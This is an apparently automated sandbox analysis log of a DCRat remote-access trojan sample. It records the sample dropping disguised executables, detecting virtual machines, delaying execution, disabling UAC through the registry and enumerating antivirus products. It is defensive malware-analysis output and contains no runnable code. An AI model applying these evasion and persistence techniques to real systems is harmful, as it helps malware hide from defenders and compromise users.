Source: C:\Recovery\System.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\System.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\System.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\System.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\System.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\System.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\System.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\System.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\System.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\System.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\System.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\System.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\System.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\System.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\System.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\System.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\System.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\System.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\System.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\System.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\System.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\System.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\System.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\System.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\System.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\System.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\System.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\System.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\System.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\System.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\System.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\System.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\System.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\System.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\System.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\System.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\System.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\System.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe

WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController

Source: C:\Users\user\Desktop\4KjLUaW30K.exe	Memory allocated: EA0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\4KjLUaW30K.exe	Memory allocated: 1AA20000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\audiodg.exe	Memory allocated: 1120000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\audiodg.exe	Memory allocated: 1AF80000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\audiodg.exe	Memory allocated: 15C0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\audiodg.exe	Memory allocated: 1AF90000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Program Files (x86)\Windows Defender\dllhost.exe	Memory allocated: 1480000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Program Files (x86)\Windows Defender\dllhost.exe	Memory allocated: 1B230000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Program Files (x86)\Windows Defender\dllhost.exe	Memory allocated: 1390000 memory reserve \| memory write watch
Source: C:\Program Files (x86)\Windows Defender\dllhost.exe	Memory allocated: 1AE60000 memory reserve \| memory write watch
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe	Memory allocated: 860000 memory reserve \| memory write watch
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe	Memory allocated: 1A570000 memory reserve \| memory write watch
Source: C:\Users\Default\OneDrive\mnUYCZffXdEgQlZPiczLektp.exe	Memory allocated: 8B0000 memory reserve \| memory write watch
Source: C:\Users\Default\OneDrive\mnUYCZffXdEgQlZPiczLektp.exe	Memory allocated: 1A780000 memory reserve \| memory write watch
Source: C:\Users\Default\OneDrive\mnUYCZffXdEgQlZPiczLektp.exe	Memory allocated: 29A0000 memory reserve \| memory write watch
Source: C:\Users\Default\OneDrive\mnUYCZffXdEgQlZPiczLektp.exe	Memory allocated: 1AB90000 memory reserve \| memory write watch
Source: C:\Users\Public\Downloads\ShellExperienceHost.exe	Memory allocated: 11D0000 memory reserve \| memory write watch
Source: C:\Users\Public\Downloads\ShellExperienceHost.exe	Memory allocated: 1AF90000 memory reserve \| memory write watch
Source: C:\Users\Public\Downloads\ShellExperienceHost.exe	Memory allocated: F90000 memory reserve \| memory write watch
Source: C:\Users\Public\Downloads\ShellExperienceHost.exe	Memory allocated: 1AE90000 memory reserve \| memory write watch
Source: C:\Recovery\System.exe	Memory allocated: A70000 memory reserve \| memory write watch
Source: C:\Recovery\System.exe	Memory allocated: 1A7F0000 memory reserve \| memory write watch
Source: C:\Recovery\System.exe	Memory allocated: 12D0000 memory reserve \| memory write watch
Source: C:\Recovery\System.exe	Memory allocated: 1AC70000 memory reserve \| memory write watch
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe	Memory allocated: A20000 memory reserve \| memory write watch
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe	Memory allocated: 1A4C0000 memory reserve \| memory write watch
Source: C:\Recovery\System.exe	Memory allocated: 1340000 memory reserve \| memory write watch
Source: C:\Recovery\System.exe	Memory allocated: 1AE30000 memory reserve \| memory write watch

Source: C:\Users\user\Desktop\4KjLUaW30K.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\audiodg.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\audiodg.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Program Files (x86)\Windows Defender\dllhost.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Program Files (x86)\Windows Defender\dllhost.exe	Thread delayed: delay time: 922337203685477
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe	Thread delayed: delay time: 922337203685477
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe	Thread delayed: delay time: 600000
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe	Thread delayed: delay time: 599883
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe	Thread delayed: delay time: 599767
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe	Thread delayed: delay time: 599651
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe	Thread delayed: delay time: 599532
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe	Thread delayed: delay time: 599412
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\Default\OneDrive\mnUYCZffXdEgQlZPiczLektp.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\Default\OneDrive\mnUYCZffXdEgQlZPiczLektp.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\Public\Downloads\ShellExperienceHost.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\Public\Downloads\ShellExperienceHost.exe	Thread delayed: delay time: 922337203685477
Source: C:\Recovery\System.exe	Thread delayed: delay time: 922337203685477
Source: C:\Recovery\System.exe	Thread delayed: delay time: 922337203685477
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe	Thread delayed: delay time: 922337203685477
Source: C:\Recovery\System.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\System32\wscript.exe	Window found: window name: WSH-Timer
Source: C:\Windows\System32\wscript.exe	Window found: window name: WSH-Timer

Source: C:\Users\user\Desktop\4KjLUaW30K.exe	Window / User API: threadDelayed 1311	Jump to behavior
Source: C:\Users\user\Desktop\4KjLUaW30K.exe	Window / User API: threadDelayed 920	Jump to behavior
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\audiodg.exe	Window / User API: threadDelayed 364	Jump to behavior
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\audiodg.exe	Window / User API: threadDelayed 361	Jump to behavior
Source: C:\Program Files (x86)\Windows Defender\dllhost.exe	Window / User API: threadDelayed 560	Jump to behavior
Source: C:\Program Files (x86)\Windows Defender\dllhost.exe	Window / User API: threadDelayed 360
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe	Window / User API: threadDelayed 1481
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe	Window / User API: threadDelayed 916
Source: C:\Users\Default\OneDrive\mnUYCZffXdEgQlZPiczLektp.exe	Window / User API: threadDelayed 364
Source: C:\Users\Default\OneDrive\mnUYCZffXdEgQlZPiczLektp.exe	Window / User API: threadDelayed 364
Source: C:\Users\Public\Downloads\ShellExperienceHost.exe	Window / User API: threadDelayed 361
Source: C:\Users\Public\Downloads\ShellExperienceHost.exe	Window / User API: threadDelayed 367
Source: C:\Recovery\System.exe	Window / User API: threadDelayed 367
Source: C:\Recovery\System.exe	Window / User API: threadDelayed 373
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe	Window / User API: threadDelayed 638
Source: C:\Recovery\System.exe	Window / User API: threadDelayed 768

Source: C:\Users\user\Desktop\4KjLUaW30K.exe TID: 6480	Thread sleep count: 1311 > 30	Jump to behavior
Source: C:\Users\user\Desktop\4KjLUaW30K.exe TID: 6480	Thread sleep count: 920 > 30	Jump to behavior
Source: C:\Users\user\Desktop\4KjLUaW30K.exe TID: 6220	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\audiodg.exe TID: 7208	Thread sleep count: 364 > 30	Jump to behavior
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\audiodg.exe TID: 5252	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\audiodg.exe TID: 7468	Thread sleep count: 361 > 30	Jump to behavior
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\audiodg.exe TID: 7284	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Defender\dllhost.exe TID: 7404	Thread sleep count: 560 > 30	Jump to behavior
Source: C:\Program Files (x86)\Windows Defender\dllhost.exe TID: 7288	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Defender\dllhost.exe TID: 7548	Thread sleep count: 360 > 30
Source: C:\Program Files (x86)\Windows Defender\dllhost.exe TID: 7472	Thread sleep time: -922337203685477s >= -30000s
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe TID: 7364	Thread sleep count: 1481 > 30
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe TID: 8052	Thread sleep time: -4611686018427385s >= -30000s
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe TID: 8052	Thread sleep time: -600000s >= -30000s
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe TID: 8052	Thread sleep time: -599883s >= -30000s
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe TID: 7356	Thread sleep count: 916 > 30
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe TID: 8052	Thread sleep time: -599767s >= -30000s
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe TID: 8052	Thread sleep time: -599651s >= -30000s
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe TID: 8052	Thread sleep time: -599532s >= -30000s
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe TID: 8052	Thread sleep time: -599412s >= -30000s
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe TID: 7812	Thread sleep time: -30000s >= -30000s
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe TID: 7340	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\Default\OneDrive\mnUYCZffXdEgQlZPiczLektp.exe TID: 7568	Thread sleep count: 364 > 30
Source: C:\Users\Default\OneDrive\mnUYCZffXdEgQlZPiczLektp.exe TID: 7452	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\Default\OneDrive\mnUYCZffXdEgQlZPiczLektp.exe TID: 7624	Thread sleep count: 364 > 30
Source: C:\Users\Default\OneDrive\mnUYCZffXdEgQlZPiczLektp.exe TID: 7492	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\Public\Downloads\ShellExperienceHost.exe TID: 7856	Thread sleep count: 361 > 30
Source: C:\Users\Public\Downloads\ShellExperienceHost.exe TID: 7628	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\Public\Downloads\ShellExperienceHost.exe TID: 7964	Thread sleep count: 367 > 30
Source: C:\Users\Public\Downloads\ShellExperienceHost.exe TID: 7688	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Recovery\System.exe TID: 7916	Thread sleep count: 367 > 30
Source: C:\Recovery\System.exe TID: 7664	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Recovery\System.exe TID: 7908	Thread sleep count: 373 > 30
Source: C:\Recovery\System.exe TID: 7680	Thread sleep time: -922337203685477s >= -30000s
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe TID: 8136	Thread sleep count: 308 > 30
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe TID: 8136	Thread sleep count: 638 > 30
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe TID: 8112	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Recovery\System.exe TID: 6204	Thread sleep count: 768 > 30
Source: C:\Recovery\System.exe TID: 8176	Thread sleep time: -922337203685477s >= -30000s

Source: C:\Windows\System32\schtasks.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Windows\System32\schtasks.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BaseBoard
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BIOS

Source: C:\Windows\System32\schtasks.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
Source: C:\Windows\System32\schtasks.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem

Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe

WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor

Source: C:\Users\user\Desktop\4KjLUaW30K.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\audiodg.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\audiodg.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Program Files (x86)\Windows Defender\dllhost.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Program Files (x86)\Windows Defender\dllhost.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Users\Default\OneDrive\mnUYCZffXdEgQlZPiczLektp.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Users\Default\OneDrive\mnUYCZffXdEgQlZPiczLektp.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Users\Public\Downloads\ShellExperienceHost.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Users\Public\Downloads\ShellExperienceHost.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Recovery\System.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Recovery\System.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Recovery\System.exe	File Volume queried: C:\ FullSizeInformation

Source: C:\Users\user\Desktop\4KjLUaW30K.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\audiodg.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\audiodg.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Program Files (x86)\Windows Defender\dllhost.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Program Files (x86)\Windows Defender\dllhost.exe	Thread delayed: delay time: 922337203685477
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe	Thread delayed: delay time: 922337203685477
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe	Thread delayed: delay time: 600000
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe	Thread delayed: delay time: 599883
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe	Thread delayed: delay time: 599767
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe	Thread delayed: delay time: 599651
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe	Thread delayed: delay time: 599532
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe	Thread delayed: delay time: 599412
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\Default\OneDrive\mnUYCZffXdEgQlZPiczLektp.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\Default\OneDrive\mnUYCZffXdEgQlZPiczLektp.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\Public\Downloads\ShellExperienceHost.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\Public\Downloads\ShellExperienceHost.exe	Thread delayed: delay time: 922337203685477
Source: C:\Recovery\System.exe	Thread delayed: delay time: 922337203685477
Source: C:\Recovery\System.exe	Thread delayed: delay time: 922337203685477
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe	Thread delayed: delay time: 922337203685477
Source: C:\Recovery\System.exe	Thread delayed: delay time: 922337203685477

Source: ae22e728c3f23233571eb704564b4445f7960812.exe.28.dr	Binary or memory string: jmVMCiGkLa87XZ73uc8
Source: 4KjLUaW30K.exe, 00000000.00000002.2104263831.000000001BD54000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}}
Source: mnUYCZffXdEgQlZPiczLektp.exe, 0000001C.00000002.2146148612.000000001B5C6000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\Desktop\4KjLUaW30K.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\4KjLUaW30K.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\audiodg.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\audiodg.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Program Files (x86)\Windows Defender\dllhost.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Program Files (x86)\Windows Defender\dllhost.exe	Process token adjusted: Debug
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe	Process token adjusted: Debug
Source: C:\Users\Default\OneDrive\mnUYCZffXdEgQlZPiczLektp.exe	Process token adjusted: Debug
Source: C:\Users\Default\OneDrive\mnUYCZffXdEgQlZPiczLektp.exe	Process token adjusted: Debug
Source: C:\Users\Public\Downloads\ShellExperienceHost.exe	Process token adjusted: Debug
Source: C:\Users\Public\Downloads\ShellExperienceHost.exe	Process token adjusted: Debug
Source: C:\Recovery\System.exe	Process token adjusted: Debug
Source: C:\Recovery\System.exe	Process token adjusted: Debug
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe	Process token adjusted: Debug

Source: C:\Users\user\Desktop\4KjLUaW30K.exe

Memory allocated: page read and write | page guard

Jump to behavior

Source: C:\Users\user\Desktop\4KjLUaW30K.exe	Process created: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe "C:\Users\All Users\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe"	Jump to behavior
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\70189604-2a9a-4ba1-809b-491977885217.vbs"
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\28bf72c6-5a6e-449b-a0d6-76cd4ab5c11d.vbs"
Source: C:\Windows\System32\wscript.exe	Process created: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe "C:\Users\All Users\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe"

Source: C:\Users\user\Desktop\4KjLUaW30K.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings

Disable UAC(promptonsecuredesktop)

Source: C:\Users\user\Desktop\4KjLUaW30K.exe

Registry value created: PromptOnSecureDesktop 0

Jump to behavior

Disables UAC (registry)

Source: C:\Users\user\Desktop\4KjLUaW30K.exe

Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System EnableLUA

Jump to behavior

Source: mnUYCZffXdEgQlZPiczLektp.exe, 0000001C.00000002.2146148612.000000001B550000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct

Stealing of Sensitive Information

Yara detected DCRat

Source: Yara match	File source: 0000001E.00000002.2180403115.0000000002BAB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000002.2187145311.0000000002EAB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2074993070.0000000002E38000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000025.00000002.2234188359.00000000024C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000002.2187145311.0000000002E91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
